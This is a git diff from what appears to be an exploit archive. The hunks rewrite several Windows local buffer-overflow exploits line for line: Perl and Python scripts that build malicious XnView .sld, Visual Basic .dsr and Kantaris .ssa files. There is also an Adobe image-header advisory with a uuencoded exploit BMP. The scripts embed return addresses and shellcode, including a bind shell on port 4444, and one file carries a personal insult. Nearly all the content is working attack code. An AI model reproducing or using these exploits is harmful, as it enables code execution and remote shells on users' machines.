@@ -1,46 +1,46 @@ -#!/usr/bin/perl - -# ================================================================ -# XnView 1.92.1 Slideshow "FontName" Buffer Overflow -# ================================================================ -# -# Calc execution POC Exploit for WinXP SP1 pro English -# -# Found by : Stefan Cornelius, Secunia Research -# Advisory : http://secunia.com/secunia_research/2008-6/advisory -# -# Exploit by : haluznik | haluznikgmail.com -# -# 04.01.2008 ..April Fools Day ;) -# ================================================================ - - -print "\n [*] XnView 1.92.1 Slideshow exploit by haluznik\n\n"; - -my $head= -"\x23\x20\x53\x6c\x69\x64\x65\x20\x53\x68". -"\x6f\x77\x20\x53\x65\x71\x75\x65\x6e\x63". -"\x65\x0d\x0a\x46\x6f\x6e\x74\x4e\x61\x6d". -"\x65\x20\x3d\x20\x22"; - -$fontname = "A" x 32 . "\xcc\x59\xfb\x77"; - -my $shellcode= -"\x33\xc0\x50\x68\x63\x61\x6c\x63\x54\x5b". -"\x50\x53\xb9\x44\x80\xc2\x77\xff\xd1\x50". -"\xbb\xfd\x98\xe7\x77\xff\xd3"; - -my $tail= -"\x22\x0d\x0a\x22\x43\x3a\x5c\x74\x65\x73". -"\x74\x2e\x6a\x70\x67\x22\x0d\x0a"; - -$sld = $head . $fontname . $shellcode . $tail; - -print " [+] Creating poc.sld file..\n"; - -open(file,">poc.sld") || die " [-] cannot write file\n"; -print(file $sld); -close(file); -print " [*] Done!\n"; - -# milw0rm.com [2008-04-02] +#!/usr/bin/perl + +# ================================================================ +# XnView 1.92.1 Slideshow "FontName" Buffer Overflow +# ================================================================ +# +# Calc execution POC Exploit for WinXP SP1 pro English +# +# Found by : Stefan Cornelius, Secunia Research +# Advisory : http://secunia.com/secunia_research/2008-6/advisory +# +# Exploit by : haluznik | haluznikgmail.com +# +# 04.01.2008 ..April Fools Day ;) +# ================================================================ + + +print "\n [*] XnView 1.92.1 Slideshow exploit by haluznik\n\n"; + +my $head= +"\x23\x20\x53\x6c\x69\x64\x65\x20\x53\x68". 
+"\x6f\x77\x20\x53\x65\x71\x75\x65\x6e\x63". +"\x65\x0d\x0a\x46\x6f\x6e\x74\x4e\x61\x6d". +"\x65\x20\x3d\x20\x22"; + +$fontname = "A" x 32 . "\xcc\x59\xfb\x77"; + +my $shellcode= +"\x33\xc0\x50\x68\x63\x61\x6c\x63\x54\x5b". +"\x50\x53\xb9\x44\x80\xc2\x77\xff\xd1\x50". +"\xbb\xfd\x98\xe7\x77\xff\xd3"; + +my $tail= +"\x22\x0d\x0a\x22\x43\x3a\x5c\x74\x65\x73". +"\x74\x2e\x6a\x70\x67\x22\x0d\x0a"; + +$sld = $head . $fontname . $shellcode . $tail; + +print " [+] Creating poc.sld file..\n"; + +open(file,">poc.sld") || die " [-] cannot write file\n"; +print(file $sld); +close(file); +print " [*] Done!\n"; + +# milw0rm.com [2008-04-02] diff --git a/platforms/windows/local/5361.py b/platforms/windows/local/5361.py index 80f95f697..777627510 100755 --- a/platforms/windows/local/5361.py +++ b/platforms/windows/local/5361.py 
@@ -1,111 +1,111 @@ -#usage: exploit.py - -print "-----------------------------------------------------------------------" -print ' [PoC 2] MS Visual Basic Enterprise Ed. 6 SP6 ".dsr" File Handling BoF\n' -print " author: shinnai" -print " mail: shinnai[at]autistici[dot]org" -print " site: http://shinnai.altervista.org\n" -print " Once you create the file, open it with Visual Basic 6 and click on" -print " command name." -print "-----------------------------------------------------------------------" - -buff = "A" * 555 - -get_EIP = "\xFF\xBE\x3F\x7E" #call ESP from user32.dll - -nop = "\x90" * 12 - -shellcode = ( - "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" - "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" - "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" - "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" - "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34" - "\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47" - "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38" - "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48" - "\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c" - "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e" - "\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58" - "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44" - "\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38" - "\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33" - "\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47" - "\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a" - "\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b" - "\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33" - "\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37" - 
"\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59" - "\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56" - "\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a" - ) - -dsrfile = ( - "VERSION 5.00\n" - "Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1\n" - " ClientHeight = 6315\n" - " ClientLeft = 0\n" - " ClientTop = 0\n" - " ClientWidth = 7980\n" - " _ExtentX = 14076\n" - " _ExtentY = 11139\n" - " FolderFlags = 1\n" - ' TypeLibGuid = "{D7133993-3B5A-4667-B63B-749EF16A1840}"\n' - ' TypeInfoGuid = "{050E7898-66AC-4150-A213-47C7725D7E7E}"\n' - " TypeInfoCookie = 0\n" - " Version = 4\n" - " NumConnections = 1\n" - " BeginProperty Connection1\n" - ' ConnectionName = "Connection1"\n' - " ConnDispId = 1001\n" - " SourceOfData = 3\n" - ' ConnectionSource= ""\n' - " Expanded = -1 'True\n" - " QuoteChar = 96\n" - " SeparatorChar = 46\n" - " EndProperty\n" - " NumRecordsets = 1\n" - " BeginProperty Recordset1\n" - ' CommandName = "Command1"\n' - " CommDispId = 1002\n" - " RsDispId = 1003\n" - ' CommandText = "' + buff + get_EIP + nop + shellcode + nop + '"\n' - ' ActiveConnectionName= "Connection1"\n' - " CommandType = 2\n" - " dbObjectType = 1\n" - " Locktype = 3\n" - " IsRSReturning = -1 'True\n" - " NumFields = 1\n" - " BeginProperty Field1\n" - " Precision = 10\n" - " Size = 4\n" - " Scale = 0\n" - " Type = 3\n" - ' Name = "ID"\n' - ' Caption = "ID"\n' - " EndProperty\n" - " NumGroups = 0\n" - " ParamCount = 0\n" - " RelationCount = 0\n" - " AggregateCount = 0\n" - " EndProperty\n" - "End\n" - 'Attribute VB_Name = "DataEnvironment1"\n' - "Attribute VB_GlobalNameSpace = False\n" - "Attribute VB_Creatable = True\n" - "Attribute VB_PredeclaredId = True\n" - "Attribute VB_Exposed = False\n" - ) - -try: - out_file = open("DataEnvironment1.dsr",'w') - out_file.write(dsrfile) - out_file.close() - print "\nFILE CREATION COMPLETED!\n" -except: - print " \n -------------------------------------" - print " Usage: exploit.py" - 
print " -------------------------------------" - print "\nAN ERROR OCCURS DURING FILE CREATION!" - -# milw0rm.com [2008-04-04] +#usage: exploit.py + +print "-----------------------------------------------------------------------" +print ' [PoC 2] MS Visual Basic Enterprise Ed. 6 SP6 ".dsr" File Handling BoF\n' +print " author: shinnai" +print " mail: shinnai[at]autistici[dot]org" +print " site: http://shinnai.altervista.org\n" +print " Once you create the file, open it with Visual Basic 6 and click on" +print " command name." +print "-----------------------------------------------------------------------" + +buff = "A" * 555 + +get_EIP = "\xFF\xBE\x3F\x7E" #call ESP from user32.dll + +nop = "\x90" * 12 + +shellcode = ( + "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" + "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" + "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" + "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" + "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34" + "\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47" + "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38" + "\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48" + "\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c" + "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e" + "\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58" + "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44" + "\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38" + "\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33" + "\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47" + "\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a" + "\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b" + "\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33" + 
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37" + "\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59" + "\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56" + "\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a" + ) + +dsrfile = ( + "VERSION 5.00\n" + "Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1\n" + " ClientHeight = 6315\n" + " ClientLeft = 0\n" + " ClientTop = 0\n" + " ClientWidth = 7980\n" + " _ExtentX = 14076\n" + " _ExtentY = 11139\n" + " FolderFlags = 1\n" + ' TypeLibGuid = "{D7133993-3B5A-4667-B63B-749EF16A1840}"\n' + ' TypeInfoGuid = "{050E7898-66AC-4150-A213-47C7725D7E7E}"\n' + " TypeInfoCookie = 0\n" + " Version = 4\n" + " NumConnections = 1\n" + " BeginProperty Connection1\n" + ' ConnectionName = "Connection1"\n' + " ConnDispId = 1001\n" + " SourceOfData = 3\n" + ' ConnectionSource= ""\n' + " Expanded = -1 'True\n" + " QuoteChar = 96\n" + " SeparatorChar = 46\n" + " EndProperty\n" + " NumRecordsets = 1\n" + " BeginProperty Recordset1\n" + ' CommandName = "Command1"\n' + " CommDispId = 1002\n" + " RsDispId = 1003\n" + ' CommandText = "' + buff + get_EIP + nop + shellcode + nop + '"\n' + ' ActiveConnectionName= "Connection1"\n' + " CommandType = 2\n" + " dbObjectType = 1\n" + " Locktype = 3\n" + " IsRSReturning = -1 'True\n" + " NumFields = 1\n" + " BeginProperty Field1\n" + " Precision = 10\n" + " Size = 4\n" + " Scale = 0\n" + " Type = 3\n" + ' Name = "ID"\n' + ' Caption = "ID"\n' + " EndProperty\n" + " NumGroups = 0\n" + " ParamCount = 0\n" + " RelationCount = 0\n" + " AggregateCount = 0\n" + " EndProperty\n" + "End\n" + 'Attribute VB_Name = "DataEnvironment1"\n' + "Attribute VB_GlobalNameSpace = False\n" + "Attribute VB_Creatable = True\n" + "Attribute VB_PredeclaredId = True\n" + "Attribute VB_Exposed = False\n" + ) + +try: + out_file = open("DataEnvironment1.dsr",'w') + out_file.write(dsrfile) + out_file.close() + print "\nFILE CREATION COMPLETED!\n" +except: + print " \n 
-------------------------------------" + print " Usage: exploit.py" + print " -------------------------------------" + print "\nAN ERROR OCCURS DURING FILE CREATION!" + +# milw0rm.com [2008-04-04] diff --git a/platforms/windows/local/5479.txt b/platforms/windows/local/5479.txt index 220f3ed7f..82c4d05c9 100755 --- a/platforms/windows/local/5479.txt +++ b/platforms/windows/local/5479.txt 
@@ -1,175 +1,175 @@ -Exploitable issue in various Adobe products -c0ntex (c0ntexb@gmail.com) Scott Laurie -February 2008 - -Vulnerable applications, tested: -Adobe Photoshop Album Starter -Adobe After Effects CS3 -Adobe Photoshop CS3 - -Not Vulnerable applications, tested: -Adobe Reader -Adobe Flash Player - -This bug is related to the parsing of header images, in that the applications -do not verify that the image header is valid before trying to render it. This -leaves an opportunity to cause an unchecked buffer overflow and allow for the -execution of malicious code. - -All the issues are standard local overflows whereby an attacker can exploit a -machine after sending the malicious image to the user, or by placing the image -on a web site or email and waiting for a user to view it in one of the effected -products. - -One fun thing with Album Starter is that it will run a service which will look -for new devices being attached to the system, things like cameras or USB drives -and when one is found it will check the device for image files. If some are -found, the application will auto-run and import the images and thus allow the -attacker to exploit locked workstations.. pretty lame but fun :) - -There is a caveats to the bug as the shellcode and return address need to be 4 -byte values. Thus a return address of 0x41424344 needs to be in the following -format: "\x44\x44\x44\x44\x43\x43\x43\x43\x42\x42\x42\x42\x41\x41\x41\x41" - - -Exploit attached for Album Starter 3.2 on Windows XP SP2 to pop calc.exe: -Used shellcode is taken from the Metasploit project. - - -begin 644 Adobe_AS_Exploit.bmp -M0DTV`````````#8````H````0`8``+`$```!``@`04%!04%!04%!04%!04%! -M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! -M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! -M04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%!04%! -M04%!04%!04%!04%!04%!04%!04'\:NM-Z/G___]@BVPD)(M%/(M\!7@![XM/ -M&(M?(`'K28LTBP'N,<"9K(3`="#!R@T*`<+K]#M4)"AUY8M?)`'K9HL,2XM? 
-M'`'K`RR+B6PD'&'#,=MDBT,PBT`,BW`5F@>T(`E5J`O_0:-D)]:U7_]934U-34T-30U/_ -MT&9H!-)F4XGAE6BD&G#'5__6:A!15?_0:*2M+NE7_]935?_0:.5)ADE7_]90 -M5%15_]"3:.=YQGE7_]95_]!F:F1F:&-MB>5J4%DIS(GG:D2)XC'`\ZK^0BW^ -M0BR3C7HXJZNK:'+^LQ;_=43_UEM74E%146H!45%54?_0:*W9!GIZ=W=W=W9V=G9[N[N[MG9V=ET='1T)"0D)/3T]/1;6UM;@8&!@7-S -MGIZ[^_O[\S,S,S# -MP\/#T='1T=K:VMJLK*RLBXN+B[2TM+3?W]_?Y^?GYQ,3$Q/V]O;V:FIJ:N?G -MY^?^_O[^75U=72\O+R_M[>WMAX>'AUM;6ULL+"PLS,S,S'Y^?GYA86%ANKJZ -MN@,#`P..CHZ.+R\O+PL+"PNLK*RLU=75U7Y^?G[O[^_OS,S,S.SL[.S1T='1 -MXN+BXFQL;&P!`0$!!04%!?+R\O(F)B8F86%A8='1T='R\O+RK*RLK(N+BXNQ -ML;&Q9V=G9WM[>WNNKJZN7EY>7BTM+2T6%A862DI*2CX^/CYE965E9V=G9[JZ -MNKK?W]_?+BXN+E]?7U^&AH:&T='1T:ZNKJXK*RLK`0$!`2HJ*BKR\O+RBHJ* -MB@$!`0$R,C(RYN;FYLS,S,R#@X.#T='1T6YN;FZ7EY>7BHJ*BEI:6EKN[N[N -MK*RLK.+BXN)F9F9FL;&QL186%A9\?'Q\.CHZ.KBXN+BNKJZN'JVMK:V.CHZ.!04%!8:&AH:_O[^_='1T=-#0 -MT-#@X.#@<'!P<'5U=76]O;V]C8V-C49&1D;FYN;F.3DY.<#`P,!"0D)"\O+R -1\C\_/S_N[N[N)R5F@>T(`E5J`O_0:-D)]:U7_]934U-34T-30U/_ +MT&9H!-)F4XGAE6BD&G#'5__6:A!15?_0:*2M+NE7_]935?_0:.5)ADE7_]90 +M5%15_]"3:.=YQGE7_]95_]!F:F1F:&-MB>5J4%DIS(GG:D2)XC'`\ZK^0BW^ +M0BR3C7HXJZNK:'+^LQ;_=43_UEM74E%146H!45%54?_0:*W9!GIZ=W=W=W9V=G9[N[N[MG9V=ET='1T)"0D)/3T]/1;6UM;@8&!@7-S +MGIZ[^_O[\S,S,S# +MP\/#T='1T=K:VMJLK*RLBXN+B[2TM+3?W]_?Y^?GYQ,3$Q/V]O;V:FIJ:N?G +MY^?^_O[^75U=72\O+R_M[>WMAX>'AUM;6ULL+"PLS,S,S'Y^?GYA86%ANKJZ +MN@,#`P..CHZ.+R\O+PL+"PNLK*RLU=75U7Y^?G[O[^_OS,S,S.SL[.S1T='1 +MXN+BXFQL;&P!`0$!!04%!?+R\O(F)B8F86%A8='1T='R\O+RK*RLK(N+BXNQ +ML;&Q9V=G9WM[>WNNKJZN7EY>7BTM+2T6%A862DI*2CX^/CYE965E9V=G9[JZ +MNKK?W]_?+BXN+E]?7U^&AH:&T='1T:ZNKJXK*RLK`0$!`2HJ*BKR\O+RBHJ* +MB@$!`0$R,C(RYN;FYLS,S,R#@X.#T='1T6YN;FZ7EY>7BHJ*BEI:6EKN[N[N +MK*RLK.+BXN)F9F9FL;&QL186%A9\?'Q\.CHZ.KBXN+BNKJZN'JVMK:V.CHZ.!04%!8:&AH:_O[^_='1T=-#0 +MT-#@X.#@<'!P<'5U=76]O;V]C8V-C49&1D;FYN;F.3DY.<#`P,!"0D)"\O+R +1\C\_/S_N[N[N)R for helping -# and discovering a very interesting thing that we will publish soon - -# -# I piss on your Business Networks course Igor Radusinovic! Go to hell! 
-# -# Vulnerability discovered by Muris Kurgas a.k.a. j0rgan -# jorganwd [at] gmail [dot] com -# http://www.jorgan.users.cg.yu - - -import os - -jmp = '\xCC\x59\xFB\x77' # Windows XP sp1 JMP ESP, u can change it... - -# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum -sc=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" - -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" - -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" -"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48" -"\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x43\x4b\x48\x4e\x37" - -"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x38" -"\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x48" -"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" - -"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" -"\x46\x4f\x4b\x33\x46\x55\x46\x52\x4a\x32\x45\x57\x45\x4e\x4b\x48" -"\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x44" - -"\x4b\x48\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x48" -"\x49\x38\x4e\x36\x46\x42\x4e\x51\x41\x46\x43\x4c\x41\x33\x4b\x4d" -"\x46\x56\x4b\x58\x43\x54\x42\x33\x4b\x48\x42\x34\x4e\x50\x4b\x38" - -"\x42\x57\x4e\x31\x4d\x4a\x4b\x38\x42\x34\x4a\x50\x50\x35\x4a\x36" -"\x50\x48\x50\x54\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56" -"\x43\x35\x48\x56\x4a\x56\x43\x53\x44\x53\x4a\x36\x47\x37\x43\x57" - -"\x44\x33\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e" -"\x4e\x4f\x4b\x53\x42\x35\x4f\x4f\x48\x4d\x4f\x45\x49\x48\x45\x4e" -"\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x46\x44\x50" - -"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55" -"\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x55\x43\x55\x43\x45\x43\x34" 
-"\x43\x55\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x46\x4a\x56\x41\x51" - -"\x4e\x55\x48\x46\x43\x45\x49\x58\x41\x4e\x45\x49\x4a\x56\x46\x4a" -"\x4c\x51\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x31" -"\x41\x45\x45\x45\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x52" - -"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d" -"\x4a\x36\x45\x4e\x49\x34\x48\x38\x49\x54\x47\x45\x4f\x4f\x48\x4d" -"\x42\x45\x46\x55\x46\x35\x45\x55\x4f\x4f\x42\x4d\x43\x59\x4a\x46" - -"\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x35\x4f\x4f\x48\x4d\x45\x45" -"\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x56\x48\x46\x4a\x36\x43\x36" -"\x4d\x56\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x55\x49\x42\x4e\x4c" - -"\x49\x58\x47\x4e\x4c\x36\x46\x54\x49\x58\x44\x4e\x41\x43\x42\x4c" -"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x54\x4e\x42" -"\x43\x49\x4d\x48\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46" - -"\x44\x57\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x37\x46\x54\x4f\x4f" -"\x48\x4d\x4b\x55\x47\x55\x44\x45\x41\x55\x41\x55\x41\x35\x4c\x46" -"\x41\x30\x41\x35\x41\x55\x45\x55\x41\x35\x4f\x4f\x42\x4d\x4a\x46" - -"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36" -"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f" -"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d" - -"\x4a\x36\x42\x4f\x4c\x38\x46\x50\x4f\x35\x43\x55\x4f\x4f\x48\x4d" -"\x4f\x4f\x42\x4d\x5a") - -bafer = '\x41' * 163868 + jmp + "\x90" * 32 + sc - -fileHandle = open ( 'film.ssa', 'w' ) - -fileHandle.write ( '[Script Info]\n') -fileHandle.write ( 'ScriptType: v4.00\n') -fileHandle.write ( 'Title: Kantaris 0.3.4 buffer-overflow\n') -fileHandle.write ( 'Collisions: Normal\n\n') - -fileHandle.write ( '[V4 Styles]\n\n') -fileHandle.write ( '[Events]\n') - -fileHandle.write ( 'Dialogue: '+ bafer) -fileHandle.close() - -# milw0rm.com [2008-04-25] +#!/usr/bin/python +# +# Kantaris 0.3.4 Media Player Local Buffer Overflow [0day!] 
+# +# The following exploit will make a film.ssa file, +# just rename the file with the name of your movie, and use your imagination + +# to pwn! :) +# Shellcode is local bind shell, just telnet to port:4444 to get command prompt :) +# +# BIG thanks to muts for helping +# and discovering a very interesting thing that we will publish soon + +# +# I piss on your Business Networks course Igor Radusinovic! Go to hell! +# +# Vulnerability discovered by Muris Kurgas a.k.a. j0rgan +# jorganwd [at] gmail [dot] com +# http://www.jorgan.users.cg.yu + + +import os + +jmp = '\xCC\x59\xFB\x77' # Windows XP sp1 JMP ESP, u can change it... + +# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum +sc=("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" + +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" + +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e" +"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48" +"\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x43\x4b\x48\x4e\x37" + +"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x44\x4a\x51\x4b\x38" +"\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x43\x4b\x48" +"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" + +"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" +"\x46\x4f\x4b\x33\x46\x55\x46\x52\x4a\x32\x45\x57\x45\x4e\x4b\x48" +"\x4f\x35\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x44" + +"\x4b\x48\x4f\x45\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x48" +"\x49\x38\x4e\x36\x46\x42\x4e\x51\x41\x46\x43\x4c\x41\x33\x4b\x4d" +"\x46\x56\x4b\x58\x43\x54\x42\x33\x4b\x48\x42\x34\x4e\x50\x4b\x38" + +"\x42\x57\x4e\x31\x4d\x4a\x4b\x38\x42\x34\x4a\x50\x50\x35\x4a\x36" +"\x50\x48\x50\x54\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56" 
+"\x43\x35\x48\x56\x4a\x56\x43\x53\x44\x53\x4a\x36\x47\x37\x43\x57" + +"\x44\x33\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e" +"\x4e\x4f\x4b\x53\x42\x35\x4f\x4f\x48\x4d\x4f\x45\x49\x48\x45\x4e" +"\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x46\x44\x50" + +"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55" +"\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x55\x43\x55\x43\x45\x43\x34" +"\x43\x55\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x46\x4a\x56\x41\x51" + +"\x4e\x55\x48\x46\x43\x45\x49\x58\x41\x4e\x45\x49\x4a\x56\x46\x4a" +"\x4c\x51\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x31" +"\x41\x45\x45\x45\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x52" + +"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d" +"\x4a\x36\x45\x4e\x49\x34\x48\x38\x49\x54\x47\x45\x4f\x4f\x48\x4d" +"\x42\x45\x46\x55\x46\x35\x45\x55\x4f\x4f\x42\x4d\x43\x59\x4a\x46" + +"\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x35\x4f\x4f\x48\x4d\x45\x45" +"\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x56\x48\x46\x4a\x36\x43\x36" +"\x4d\x56\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x55\x49\x42\x4e\x4c" + +"\x49\x58\x47\x4e\x4c\x36\x46\x54\x49\x58\x44\x4e\x41\x43\x42\x4c" +"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x54\x4e\x42" +"\x43\x49\x4d\x48\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46" + +"\x44\x57\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x37\x46\x54\x4f\x4f" +"\x48\x4d\x4b\x55\x47\x55\x44\x45\x41\x55\x41\x55\x41\x35\x4c\x46" 